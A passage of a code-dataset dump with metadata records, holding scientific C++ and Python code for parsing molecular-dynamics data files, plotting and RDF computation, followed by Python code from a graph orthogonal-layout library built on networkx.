(auto &it = first; it != last; ++it)\n {\n const unsigned int key(it->word_as_float(0));\n const float mass = it->word_as_float(1);\n this->_masses[key] = mass;\n }\n }\n\n if (pair_coeffs_idx)\n {\n typedef std::tuple<float, float> T;\n this->_pair_coeffs = (T *)malloc(\n sizeof(T) * (this->_atom_types + 1));\n auto first = lines.begin() + pair_coeffs_idx + 2;\n auto last = lines.begin() + pair_coeffs_idx + 2 + this->_atom_types;\n for (auto &it = first; it != last; ++it)\n {\n const unsigned int key(it->word_as_float(0));\n const float eps = it->word_as_float(1);\n const float sig = it->word_as_float(2);\n this->_pair_coeffs[key] = {eps, sig};\n }\n }\n\n if (bond_coeffs_idx)\n {\n typedef std::tuple<float, float> T;\n this->_bond_coeffs = (T *)malloc(\n sizeof(T) * (this->_bond_types + 1));\n auto first = lines.begin() + bond_coeffs_idx + 2;\n auto last = lines.begin() + bond_coeffs_idx + 2 + this->_bond_types;\n for (auto &it = first; it != last; ++it)\n {\n const unsigned int key(it->word_as_float(0));\n const float k = it->word_as_float(1);\n const float l = it->word_as_float(2);\n this->_bond_coeffs[key] = {k, l};\n }\n }\n\n if (angle_coeffs_idx)\n {\n typedef std::tuple<float, float> T;\n this->_angle_coeffs = (T *)malloc(\n sizeof(T) * (this->_angle_types + 1));\n auto first = lines.begin() + angle_coeffs_idx + 2;\n auto last = lines.begin() + angle_coeffs_idx + 2 + this->_angle_types;\n for (auto &it = first; it != last; ++it)\n {\n const unsigned int key(it->word_as_float(0));\n const float k = it->word_as_float(1);\n const float theta = it->word_as_float(2);\n this->_angle_coeffs[key] = {k, theta};\n }\n }\n\n if (dihedral_coeffs_idx)\n {\n typedef std::tuple<float, int, int> T;\n this->_dihedral_coeffs = (T *)malloc(\n sizeof(T) * (this->_dihedral_types + 1));\n auto first = lines.begin() + dihedral_coeffs_idx + 2;\n auto last = lines.begin() + dihedral_coeffs_idx + 2\n + this->_dihedral_types;\n for (auto &it = first; it != last; ++it)\n {\n const unsigned int key(it->word_as_float(0));\n const float k = it->word_as_float(1);\n const int d(it->word_as_float(2));\n const int n(it->word_as_float(3));\n this->_dihedral_coeffs[key] = {k, d, n};\n }\n }\n\n if (improper_coeffs_idx)\n {\n typedef std::tuple<float, int, int> T;\n this->_improper_coeffs = (T *)malloc(\n sizeof(T) * (this->_improper_types + 1));\n auto first = lines.begin() + improper_coeffs_idx + 2;\n auto last = lines.begin() + improper_coeffs_idx + 2\n + this->_improper_types;\n for (auto &it = first; it != last; ++it)\n {\n const unsigned int key(it->word_as_float(0));\n const float k = it->word_as_float(1);\n const int d(it->word_as_float(2));\n const int n(it->word_as_float(3));\n this->_improper_coeffs[key] = {k, d, n};\n }\n }\n\n {\n this->_atoms = (Atom *)malloc(sizeof(Atom) * (this->_atoms_count + 1));\n auto first = lines.begin() + atoms_idx + 2;\n auto last = lines.begin() + atoms_idx + 2 + this->_atoms_count;\n for (auto &it = first; it != last; ++it)\n {\n const int atom_id(it->word_as_float(0));\n const int molecule_tag(it->word_as_float(1));\n const int atom_type_id (it->word_as_float(2));\n const float q = (it->word_as_float(3));\n const float x = (it->word_as_float(4));\n const float y = (it->word_as_float(5));\n const float z = (it->word_as_float(6));\n const int nx(it->word_as_float(7));\n const int ny(it->word_as_float(8));\n const int nz(it->word_as_float(9));\n this->_atoms[atom_id] = Atom(atom_id, molecule_tag, atom_type_id,\n q, x, y, z, nx, ny, nz);\n }\n }\n\n if (velocities_idx)\n {\n typedef std::tuple<float, float, float> T;\n this->_velocities = (T *)malloc(sizeof(T) * (this->_atoms_count + 1));\n auto first = lines.begin() + velocities_idx + 2;\n auto last = lines.begin() + velocities_idx + 2 + this->_atoms_count;\n for (auto &it = first; it != last; ++it)\n {\n const size_t atom_id(it->word_as_float(0));\n const float vx = (it->word_as_float(1));\n const float vy = (it->word_as_float(2));\n const float vz = (it->word_as_float(3));\n std::array<float, 3> v{{vx, vy, vz}};\n }\n }\n\n if (bonds_idx)\n {\n this->_bonds = (Bond *)malloc(sizeof(Bond) * (this->_bonds_count + 1));\n auto first = lines.begin() + bonds_idx + 2;\n auto last = lines.begin() + bonds_idx + 2 + this->_bonds_count;\n for (auto &it = first; it != last; ++it)\n {\n \n const int bond_id(it->word_as_float(0));\n const int bond_type_id(it->word_as_float(1));\n const int atom_one_id(it->word_as_float(2));\n const int atom_two_id(it->word_as_float(3));\n this->_bonds[bond_id] = Bond(bond_id, bond_type_id,\n atom_one_id, atom_two_id);\n }\n }\n\n if (angles_idx)\n {\n this->_angles = (Angle *)malloc(sizeof(Angle)\n * (this->_angles_count + 1));\n auto first = lines.begin() + angles_idx + 2;\n auto last = lines.begin() + angles_idx + 2 + this->_angles_count;\n for (auto &it = first; it != last; ++it)\n {\n const int angle_id(it->word_as_float(0));\n const int angle_type_id(it->word_as_float(1));\n const int atom_one_id(it->word_as_float(2));\n const int atom_two_id(it->word_as_float(3));\n const int atom_three_id(it->word_as_float(4));\n this->_angles[angle_id] = Angle(angle_id, angle_type_id,\n atom_one_id, atom_two_id, atom_three_id);\n }\n }\n\n if (dihedrals_idx)\n {\n this->_dihedrals = (Dihedral *)malloc(sizeof(Dihedral)\n * (this->_dihedrals_count + 1));\n auto first = lines.begin() + dihedrals_idx + 2;\n auto last = lines.begin() + dihedrals_idx + 2 + this->_dihedrals_count;\n for (auto &it = first; it != last; ++it)\n {\n const int dihedral_id(it->word_as_float(0));\n const int dihedral_type_id(it->word_as_float(1));\n const int atom_one_id(it->word_as_float(2));\n const int atom_two_id(it->word_as_float(3));\n const int atom_three_id(it->word_as_float(4));\n const int atom_four_id(it->word_as_float(5));\n this->_dihedrals[dihedral_id] = Dihedral(\n dihedral_id, dihedral_type_id,\n atom_one_id, atom_two_id, atom_three_id, atom_four_id);\n }\n }\n\n if (impropers_idx)\n {\n this->_impropers = (Improper *)malloc(sizeof(Improper)\n * (this->_impropers_count + 1));\n auto first = lines.begin() + impropers_idx + 2;\n auto last = lines.begin() + impropers_idx + 2 + this->_impropers_count;\n for (auto &it = first; it != last; ++it)\n {\n const int improper_id(it->word_as_float(0));\n const int improper_type_id(it->word_as_float(1));\n const int atom_one_id(it->word_as_float(2));\n const int atom_two_id(it->word_as_float(3));\n const int atom_three_id(it->word_as_float(4));\n const int atom_four_id(it->word_as_float(5));\n this->_impropers[improper_id] = Improper(\n improper_id, improper_type_id,\n atom_one_id, atom_two_id, atom_three_id, atom_four_id);\n }\n }\n }\n\nprivate:\n std::string _fname;\n std::string _comment;\n Atom* _atoms;\n unsigned int _atoms_count;\n unsigned int _atom_types;\n std::tuple<float, float, float>* _velocities;\n Bond* _bonds;\n unsigned int _bonds_count;\n unsigned int _bond_types;\n Angle* _angles;\n unsigned int _angles_count;\n unsigned int _angle_types;\n Dihedral* _dihedrals;\n unsigned int _dihedrals_count;\n unsigned int _dihedral_types;\n Improper* _impropers;\n unsigned int _impropers_count;\n unsigned int _improper_types;\n float _xlo = 0, _xhi = 0, _ylo = 0, _yhi = 0, _zlo = 0, _zhi = 0;\n float _xy = 0, _xz = 0, _yz = 0;\n float *_masses;\n std::tuple<float, float>* _pair_coeffs;\n std::tuple<float, float>* _bond_coeffs;\n std::tuple<float, float>* _angle_coeffs;\n std::tuple<float, int, int>* _dihedral_coeffs;\n std::tuple<float, int, int>* _improper_coeffs;\n};\n\n\n#endif // DATAFILE_CONTENT_HPP include guard\n"
},
{
"alpha_fraction": 0.4871987998485565,
"alphanum_fraction": 0.5225903391838074,
"avg_line_length": 27.255319595336914,
"blob_id": "06c3262db67f27f431d74381a268f0b006d1f4ea",
"content_id": "e57cc1ee3b7dd0812cd5e7ee724ee00ff17e298a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2794,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 94,
"path": "/plot_seria.py",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "# Originates from:\n# https://github.com/ansko/dpd_analyzers\n# /commit/???\n# /plot_mmt_distance.py\n\n'''\nThis is a toll to compare exfoliation tempos.\n'''\n\n\nimport math\nimport random\nimport sys\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\n\nif __name__ == '__main__':\n regime = sys.argv[1]\n\n title = ''\n fnames = []\n legends = []\n ylims = []\n\n if regime == 'poly_mod_likeness':\n title = 'Полимер и хвост модификатора отталкиваются слабо'\n fnames = ['outs/' + regime + \"_\" + str(idx) for idx in range(4)]\n legends = [\n '100, ave', '100, closest',\n '200, ave', '200, closest',\n '300, ave', '300, closest',\n '400, ave', '400, closest'\n ]\n ylims = [0, 5]\n elif regime == 'article_params':\n title = 'Параметры из статей итальянцев'\n fnames = ['outs/' + regime + \"_\" + str(idx) for idx in range(4)]\n legends = [\n '100, ave', '100, closest',\n '200, ave', '200, closest',\n '300, ave', '300, closest',\n '400, ave', '400, closest'\n ]\n ylims = [0, 5]\n elif regime == 'npt_attraction':\n title = ('Полимер и хвост модификатора отталкиваются слабо'\n '\\nно (a_ij большие)')\n fnames = ['outs/' + regime + \"_\" + str(idx) for idx in range(4)]\n legends = [\n '100, ave', '100, closest',\n '200, ave', '200, closest',\n '300, ave', '300, closest',\n '400, ave', '400, closest'\n ]\n ylims = [0, 5]\n\n else:\n raise NotImplemented\n\n xlabel = r'Время, k$\\tau$'\n ylabel = r'Расстояние в $r_c$ ($r_c$ = 5.23$\\AA$)'\n out_fname = regime + '.pdf'\n\n colors = list('rgbk')\n plotted_lines = []\n for idx, fname in enumerate(fnames):\n xs = []\n ys = []\n ys2 = []\n for line in open(fname).readlines():\n xs.append(float(line.split()[0]))\n ys.append(float(line.split()[1]))\n try:\n ys2.append(float(line.split()[2]))\n except IndexError:\n pass\n color = random.choice(colors)\n colors.pop(colors.index(color))\n new_line, = plt.plot(xs, ys, color, label=legends[idx], linewidth=3)\n plotted_lines.append(new_line)\n new_line, = plt.plot(xs, ys2, color, label=legends[idx], linewidth=1)\n plotted_lines.append(new_line)\n \n\n plt.title(title)\n plt.gca().set_ylim(ylims)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.legend(plotted_lines, legends, fontsize=8)\n plt.savefig(out_fname)\n\n print('Successful finish for', regime)\n"
},
{
"alpha_fraction": 0.7245901823043823,
"alphanum_fraction": 0.7245901823043823,
"avg_line_length": 15.94444465637207,
"blob_id": "5a5a43a2209b93f83e5148f4190703ebfe8cb976",
"content_id": "23094215d70f8316a0802587a891982829ec9631",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 305,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 18,
"path": "/src/get_rdf.hpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#ifndef GET_RDF_HPP\n#define GET_RDF_HPP\n\n\n#include <algorithm>\n#include <cmath>\n#include <map>\n#include <vector>\n\n#include \"datafile_content.hpp\"\n#include \"structures.hpp\"\n\n\nstd::map<float, float>\nget_rdf(DatafileContent &dfc, std::vector<unsigned int> atom_types);\n\n\n#endif // GET_RDF_HPP include guard\n"
},
{
"alpha_fraction": 0.4315861165523529,
"alphanum_fraction": 0.4349897801876068,
"avg_line_length": 27.25,
"blob_id": "a0dc83c00b3629be58c4b84b169ed7aaa1467bdd",
"content_id": "431ffe1ff947cb8fff9a0ee825b045ea76d5d9bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1469,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 52,
"path": "/src/get_rdf.cpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#include \"get_rdf.hpp\"\n\n\nstd::map<float, float>\nget_rdf(DatafileContent &dfc, std::vector<unsigned int> atom_types)\n{\n std::map<float, float> result;\n\n const Atom *atoms = dfc.atoms();\n const unsigned int atoms_count = dfc.atoms_count();\n\n float lx(dfc.xhi() - dfc.xlo());\n float ly(dfc.yhi() - dfc.ylo());\n float lz(dfc.zhi() - dfc.zlo());\n\n for (unsigned int i = 1; i < atoms_count + 1; ++i)\n {\n if (std::find(atom_types.begin(), atom_types.end(), atoms[i].type())\n == atom_types.end())\n {\n continue;\n }\n for (unsigned int j = i + 1; j < atoms_count; ++j)\n {\n if (std::find(atom_types.begin(), atom_types.end(), atoms[j].type())\n == atom_types.end())\n {\n continue;\n }\n\n float dx(std::fabs(atoms[i].x() - atoms[j].x()));\n float dy(std::fabs(atoms[i].y() - atoms[j].y()));\n float dz(std::fabs(atoms[i].z() - atoms[j].z()));\n dx = std::min(dx, lx - dx);\n dy = std::min(dy, ly - dy);\n dz = std::min(dz, lz - dz);\n float dr(sqrt(dx*dx + dy*dy + dz*dz));\n\n dr = float(int(dr));\n if (result.find(dr) == result.end())\n {\n result[dr] = 1 / dr/dr;\n }\n else\n {\n result[dr] += 1/dr/dr;\n }\n }\n }\n\n return result;\n}\n"
}
] | 14 |
balhayer/Best-File-Search | https://github.com/balhayer/Best-File-Search | 0b6d2c24d00449260dba87434ee300a61f974366 | ff8747c4c24e964316b7f7a1bec261c9cc9af1e8 | 6da11326e2fce393b34bb0d5fe90698333a6d8f3 | refs/heads/master | 2022-12-08T22:39:16.287109 | 2020-08-29T21:03:01 | 2020-08-29T21:03:01 | 291,347,190 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5285079479217529,
"alphanum_fraction": 0.5423917174339294,
"avg_line_length": 35.24827575683594,
"blob_id": "b6831f6541cd10ed3240e135511e45dfd0dca9c9",
"content_id": "381bac1e0d6275e968a03bb9165bac970d6cdb41",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10804,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 290,
"path": "/Best-File-Search-master/Best File Search/Best File Search.py",
"repo_name": "balhayer/Best-File-Search",
"src_encoding": "UTF-8",
"text": "import os\r\nimport tkinter\r\nfrom tkinter import *\r\nfrom PyPDF2 import PdfFileReader #PDF\r\nimport comtypes.client #DOCX\r\nimport win32api # install pypiwin32, PyMuPDF, python-pptx, python-docx\r\nfrom docx import Document\r\nfrom docx.enum.text import WD_COLOR_INDEX\r\nfrom pptx import Presentation\r\nimport xlsxwriter #EXCEL\r\nfrom xlsxwriter.utility import xl_rowcol_to_cell\r\nimport xlrd\r\nimport fitz # PDF\r\n\r\n\r\ndef init(window):\r\n window.title(\"Best File Search\")\r\n window.geometry(\"700x640\")\r\n window.resizable(False, False)\r\n\r\n # Configure Widgets\r\n frame.place(x=300, y=78) # set for fileList(Listbox) scrollbar\r\n frame2.place(x=300, y=412)\r\n scrollbar.configure(command=fileList.yview)\r\n fileList.configure(yscrollcommand=scrollbar.set)\r\n scrollbar2.configure(command=fileList.yview)\r\n openedFileList.configure(yscrollcommand=scrollbar.set)\r\n backgroundlabel.configure(image=backgroundimage)\r\n bClear.configure(command=buttonClear)\r\n bOpen.configure(command=buttonOpen)\r\n btnSearch.configure(command=executeSearchButton)\r\n bClearTwo.configure(command=buttonClearTwo)\r\n # Place Widgets\r\n # labelsearchtext.place(x=40, y=80)\r\n # labledesiredpath.place(x=40, y=230)\r\n desiredpath.place(x=130, y=250)\r\n searchText.place(x=41, y=125)\r\n # searchedFileName.place(x=300, y=30)\r\n # openedFileName.place(x=300, y=380)\r\n btnSearch.place(x=170, y=110, width=50, height=50)\r\n bClear.place(x=620, y=385, width=50, height=20)\r\n bClearTwo.place(x=565,y=50, width=50, height=20)\r\n bOpen.place(x=620, y=50, width=50, height=20)\r\n\r\ndef buttonClear():\r\n openedFileList.delete(0, END)\r\n\r\ndef buttonClearTwo():\r\n fileList.delete(0, END)\r\n\r\ndef buttonOpen():\r\n value = fileList.get(fileList.curselection()[0])\r\n #os.startfile(value)\r\n\r\n searchInput = searchText.get()\r\n\r\n ext = os.path.splitext(value)[-1]\r\n pathExceptExt = os.path.splitext(value)[0]\r\n\r\n if ext == \".pptx\":\r\n powerpoint = comtypes.client.CreateObject(\"Powerpoint.Application\")\r\n powerpoint.Visible = 1\r\n\r\n Filename = value\r\n deck = powerpoint.Presentations.Open(Filename)\r\n deck.SaveAs(pathExceptExt + \".pdf\", 32) # formatType = 32 for ppt to pdf\r\n\r\n value2 = pathExceptExt + \".pdf\"\r\n doc = fitz.open(value2)\r\n pdf = PdfFileReader(value2)\r\n saveNumPages = pdf.getNumPages()\r\n\r\n for i in range(saveNumPages):\r\n page = doc[i]\r\n text_instances = page.searchFor(searchInput)\r\n\r\n for inst in text_instances:\r\n highlight = page.addHighlightAnnot(inst)\r\n doc.save(pathExceptExt + \"_modified.pdf\", garbage=4, deflate=True, clean=True)\r\n os.startfile(pathExceptExt + \"_modified.pdf\")\r\n\r\n elif ext == \".txt\":\r\n with open(value, mode='r', encoding='utf-8') as fo:\r\n textthis = fo.read()\r\n\r\n with open(pathExceptExt + \".html\", \"w\") as e:\r\n if searchInput in textthis:\r\n e.write(\"<pre>\" + textthis.replace(searchInput, '<span style=\"background-color: #FFFF00\">{}</span>'.format(\r\n searchInput)) + \"</pre> <br>\\n\")\r\n os.startfile(pathExceptExt + \".html\")\r\n elif ext == \".xlsx\":\r\n\r\n wbk = xlsxwriter.Workbook(value)\r\n wks = wbk.add_worksheet()\r\n myPath = value\r\n\r\n cell_format = wbk.add_format()\r\n cell_format.set_bg_color('yellow')\r\n for sh in xlrd.open_workbook(myPath).sheets():\r\n for row in range(sh.nrows):\r\n for col in range(sh.ncols):\r\n mycell = sh.cell(row, col)\r\n if mycell.value == searchInput:\r\n wks.write(xl_rowcol_to_cell(row, col), searchInput, cell_format)\r\n else:\r\n wks.write(xl_rowcol_to_cell(row, col), mycell.value)\r\n wbk.close()\r\n os.startfile(value)\r\n elif ext == \".docx\":\r\n document = Document(value)\r\n\r\n for para in document.paragraphs:\r\n start = para.text.find(searchInput)\r\n if start > -1:\r\n pre = para.text[:start]\r\n post = para.text[start + len(searchInput):]\r\n para.text = pre\r\n para.add_run(searchInput)\r\n para.runs[1].font.highlight_color = WD_COLOR_INDEX.YELLOW\r\n para.add_run(post)\r\n document.save(pathExceptExt + \"_modified.docx\")\r\n os.startfile(pathExceptExt + \"_modified.docx\")\r\n\r\n elif ext == \".pdf\":\r\n\r\n doc = fitz.open(value)\r\n for i in range(10):\r\n try:\r\n page = doc[i]\r\n\r\n text_instances = page.searchFor(searchInput)\r\n\r\n for inst in text_instances:\r\n highlight = page.addHighlightAnnot(inst)\r\n\r\n except IndexError:\r\n break\r\n doc.save(pathExceptExt + \"_mod.pdf\", garbage=4, deflate=True, clean=True)\r\n os.startfile(pathExceptExt + \"_mod.pdf\")\r\n\r\n openedFileList.insert(END, value)\r\n\r\n# Determine whether there are specific strings in some files such as .txt, .docx, .pptx files\r\n# then insert their path and name to the list\r\ndef searchDir(root_folder, searchInput):\r\n\r\n #exceptFolderList = [ \"AppData\", \"WINDOWS\", \"Windows\", \"Program Files (x86)\", \"Program Files\"]\r\n\r\n try:\r\n filenames = os.listdir(root_folder)\r\n\r\n for filename in filenames:\r\n full_filename = os.path.join(root_folder, filename)\r\n\r\n if os.path.isdir(full_filename):\r\n if filename == \"AppData\" or filename == \"WINDOWS\" or filename == \"Windows\" or filename == \"Program Files (x86)\" or filename == \"Program Files\":\r\n pass\r\n else:\r\n searchDir(full_filename, searchInput)\r\n\r\n else:\r\n ext = os.path.splitext(full_filename)[-1]\r\n #Search TXT files\r\n if ext == \".pdf\":\r\n try:\r\n doc = fitz.open(full_filename)\r\n page = doc[0]\r\n text_instances = page.searchFor(searchInput)\r\n if text_instances:\r\n print(full_filename)\r\n fileList.insert(END, full_filename)\r\n break\r\n except:\r\n pass\r\n\r\n elif ext == \".txt\":\r\n try:\r\n fo = open(full_filename, 'r', encoding='utf-8', errors='ignore')\r\n\r\n if searchInput in fo.read():\r\n print(full_filename)\r\n fileList.insert(END, full_filename)\r\n break\r\n except:\r\n pass\r\n\r\n elif ext == \".docx\":\r\n try:\r\n print(full_filename)\r\n document = Document(full_filename)\r\n\r\n for para in document.paragraphs:\r\n if searchInput in para.text:\r\n fileList.insert(END, full_filename)\r\n break\r\n except:\r\n pass\r\n elif ext == \".xlsx\":\r\n try:\r\n print(full_filename)\r\n wbk = xlsxwriter.Workbook(full_filename)\r\n wks = wbk.add_worksheet()\r\n\r\n myPath = full_filename\r\n for sh in xlrd.open_workbook(myPath).sheets():\r\n for row in range(sh.nrows):\r\n for col in range(sh.ncols):\r\n myCell = sh.cell(row, col)\r\n if myCell.value == searchInput:\r\n fileList.insert(END, full_filename)\r\n break\r\n break\r\n except:\r\n pass\r\n elif ext == \".pptx\":\r\n try:\r\n print(full_filename)\r\n prs = Presentation(full_filename)\r\n for slide in prs.slides:\r\n for shape in slide.shapes:\r\n if hasattr(shape, \"text\"):\r\n if searchInput in shape.text:\r\n fileList.insert(END, full_filename)\r\n break\r\n break\r\n except:\r\n pass\r\n\r\n except PermissionError:\r\n pass\r\n\r\n# Search User's HDD. Send the information of HDD and filetypes.\r\ndef searchInfo():\r\n searchInput = searchText.get()\r\n HDD_List = []\r\n\r\n for drive in win32api.GetLogicalDriveStrings().split('\\000')[:-1]:\r\n # insert the name of HDDs to the ListBox to display them for User to see.\r\n onlyHDDname = drive.split(\":\")\r\n desiredpath.delete(0, END)\r\n HDD_List.append(onlyHDDname[0])\r\n\r\n for i in HDD_List[0:]:\r\n desiredpath.insert(END, i + \" \")\r\n\r\n # Specify the file_type.\r\n print(\"Finding files\")\r\n searchDir(drive, searchInput)\r\n\r\n# Execute Search Button\r\ndef executeSearchButton():\r\n searchInfo()\r\n\r\nwindow = Tk()\r\nC = Canvas(window, bg=\"blue\", height=250)\r\nbackgroundimage = PhotoImage(file=\"image.png\")\r\nbackgroundlabel = Label(window)\r\nbackgroundlabel.pack()\r\n\r\nframe = Frame(window)\r\nframe2 = Frame(window)\r\n\r\nbOpen = tkinter.Button(window, text=\"open\")\r\nbClear = tkinter.Button(window, text=\"Clear\")\r\nbClearTwo = tkinter.Button(window, text=\"Clear\")\r\nbtnSearch = tkinter.Button(window, text=\"search\")\r\nlabelsearchtext = tkinter.Label(window, text=\"Enter text\")\r\nlabledesiredpath = tkinter.Label(window, text=\"Searched HDD\")\r\nopenedFileName = tkinter.Label(window, text=\"Opened Files\")\r\nsearchedFileName = tkinter.Label(window, text=\"Searched Files\")\r\n\r\nfileList = Listbox(frame, width=50, height=17)\r\nfileList.pack(side='left', fill='y')\r\nscrollbar = Scrollbar(frame, orient=VERTICAL)\r\nscrollbar.pack(side=\"right\", fill=\"y\")\r\nscrollbar2 = Scrollbar(frame2, orient=VERTICAL)\r\nscrollbar2.pack(side=\"right\", fill=\"y\")\r\n\r\nopenedFileList = Listbox(frame2, width=50)\r\nopenedFileList.pack(side='left', fill='y')\r\nfileList.pack(side='left', fill='y')\r\ndesiredpath = tkinter.Listbox(window, width=10, height=5)\r\nsearchText = tkinter.Entry(window, width=16)\r\n\r\n#fileList.bind('<<ListboxSelect>>', openFile)\r\n#fileList.bind('<Double-Button>', buttonOpen)\r\nopenedFileList.bind('<Double-Button>', buttonOpen)\r\n# initialise and run main loop\r\ninit(window)\r\nmainloop()\r\n\r\n"
}
] | 1 |
uknfire/tsmpy | https://github.com/uknfire/tsmpy | beac4f9cbeac45818bb86144f16c0c120700df46 | 5f306fd12ce0833279b86baa66655eeec508e03a | 7b74451ac8345e5d7d2ccb952bbd7951971df80d | refs/heads/master | 2023-06-03T05:04:12.777626 | 2021-06-19T10:21:42 | 2021-06-19T10:21:42 | 190,006,088 | 4 | 2 | null | null | null | null | null | [
{
"alpha_fraction": 0.5853658318519592,
"alphanum_fraction": 0.5943992733955383,
"avg_line_length": 33.59375,
"blob_id": "73499b23a0264a3f39f90795529a4a8a0aa41c34",
"content_id": "7da93addb54a70d1c303c32077a8fc668642e6be",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1107,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 32,
"path": "/tsmpy/tsm/planarization.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "from .utils import convert_pos_to_embedding\nfrom tsmpy.dcel import Dcel\nimport networkx as nx\n\n\nclass Planarization:\n \"\"\"Determine the topology of the drawing which is described by a planar embedding.\n \"\"\"\n\n def __init__(self, G, pos=None):\n if pos is None:\n is_planar, embedding = nx.check_planarity(G)\n pos = nx.combinatorial_embedding_to_pos(embedding)\n else:\n embedding = convert_pos_to_embedding(G, pos)\n\n self.G = G.copy()\n self.dcel = Dcel(G, embedding)\n self.dcel.ext_face = self.get_external_face(pos)\n self.dcel.ext_face.is_external = True\n\n def get_external_face(self, pos):\n corner_node = min(pos, key=lambda k: (pos[k][0], pos[k][1]))\n\n sine_vals = {}\n for node in self.G.adj[corner_node]:\n dx = pos[node][0] - pos[corner_node][0]\n dy = pos[node][1] - pos[corner_node][1]\n sine_vals[node] = dy / (dx**2 + dy**2)**0.5\n\n other_node = min(sine_vals, key=lambda node: sine_vals[node])\n return self.dcel.half_edges[corner_node, other_node].inc\n"
},
{
"alpha_fraction": 0.6248462200164795,
"alphanum_fraction": 0.6305863261222839,
"avg_line_length": 30.269229888916016,
"blob_id": "0bb680242caf3fa9059fde2869c0f254b8e31712",
"content_id": "e8df63c732c7995308d44dde031c4f07437db259",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2439,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 78,
"path": "/tsmpy/tsm/tsm.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "\"\"\"TSM means topology-shape-metrics, one approach for generating orthogonal layout.\n\"\"\"\nfrom .planarization import Planarization\nfrom .orthogonalization import Orthogonalization\nfrom .compaction import Compaction\nfrom .utils import number_of_cross\nimport networkx as nx\nfrom matplotlib import pyplot as plt\n\n__all__ = [\n \"TSM\",\n \"ortho_layout\",\n \"is_bendnode\",\n \"precheck\"\n]\n\ndef ortho_layout(G, init_pos=None, uselp=True):\n \"\"\"\n Returns\n -------\n G : Networkx graph\n which may contain bend nodes\n\n pos : dict\n A dictionary of positions keyed by node\n \"\"\"\n\n planar = Planarization(G, init_pos)\n ortho = Orthogonalization(planar, uselp)\n compa = Compaction(ortho)\n return compa.G, compa.pos\n\n\ndef is_bendnode(node):\n return type(node) is tuple and len(node) > 1 and node[0] == \"bend\"\n\n\ndef precheck(G, pos=None):\n \"\"\"Check if input is valid. If not, raise an exception\"\"\"\n if max(degree for node, degree in G.degree) > 4:\n raise Exception(\n \"Max node degree larger than 4, which is not supported currently\")\n if nx.number_of_selfloops(G) > 0:\n raise Exception(\"G contains selfloop\")\n if not nx.is_connected(G):\n raise Exception(\"G is not a connected graph\")\n\n if pos is None:\n is_planar, _ = nx.check_planarity(G)\n if not is_planar:\n raise Exception(\"G is not a planar graph\")\n else:\n if number_of_cross(G, pos) > 0:\n raise Exception(\"There are cross edges in given layout\")\n\n for node in G.nodes:\n if type(node) is tuple and len(node) > 1 and node[0] in (\"dummy\", \"bend\"):\n raise Exception(f\"Invalid node name: {node}\")\n\n\n# TODO: implement it rightly in the future\n# def postcheck(G, pos):\n# \"\"\"Check if there is cross or overlay in layout\"\"\"\n# for u, v in G.edges:\n# assert pos[u][0] == pos[v][0] or pos[u][1] == pos[v][1]\n\n\nclass TSM:\n def __init__(self, G, init_pos=None, uselp=False):\n self.G, self.pos = ortho_layout(G, init_pos, uselp)\n\n def display(self):\n \"\"\"Draw layout with networkx draw lib\"\"\"\n plt.axis('off')\n # draw edge first, otherwise edge may not be shown in result\n nx.draw_networkx_edges(self.G, self.pos)\n nx.draw_networkx_nodes(self.G, self.pos, nodelist=[node for node in self.G.nodes if not is_bendnode(\n node)], node_color='white', node_size=15, edgecolors=\"black\")\n"
},
{
"alpha_fraction": 0.5010855197906494,
"alphanum_fraction": 0.5110725164413452,
"avg_line_length": 37.38333511352539,
"blob_id": "4cbcbfee99e65c066ac1802a89b4cc0e28fa0ce1",
"content_id": "2f277327f6883d68158a3206facb7b30664d911b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2303,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 60,
"path": "/tsmpy/tsm/flownet.py",
"repo_name": "uknfire/tsmpy",
"src_encoding": "UTF-8",
"text": "\"\"\"\n\"\"\"\nimport networkx as nx\nfrom collections import defaultdict\n\nclass Flow_net(nx.MultiDiGraph):\n def add_v2f(self, v, f, key):\n self.add_edge(v, f, key=key, lowerbound=1, capacity=4, weight=0)\n\n def add_f2f(self, f1, f2, key):\n # if not self.has_edge(f1, f2):\n self.add_edge(f1, f2, key=key, lowerbound=0, capacity=2**32, weight=1)\n\n def add_v(self, v):\n self.add_node(v, demand=-4) # the total degree around a node is 2pi\n\n def add_f(self, f, degree, is_external):\n # the degree of a face is the length of the cycle bounding the face.\n self.add_node(f, demand=(2 * degree + 4)\n if is_external else (2 * degree - 4))\n\n def min_cost_flow(self):\n def get_demand(flow_dict, node):\n in_flow = sum(flow_dict[u][v][key]\n for u, v, key in self.in_edges(node, keys=True))\n out_flow = sum(flow_dict[u][v][key]\n for u, v, key in self.out_edges(node, keys=True))\n return in_flow - out_flow\n\n def split(multi_flowG):\n base_dict = defaultdict(lambda: defaultdict(dict))\n new_mdg = nx.MultiDiGraph()\n\n for u, v, key in multi_flowG.edges:\n lowerbound = multi_flowG[u][v][key]['lowerbound']\n base_dict[u][v][key] = lowerbound\n new_mdg.add_edge(u, v, key,\n capacity=multi_flowG[u][v][key]['capacity'] -\n lowerbound,\n 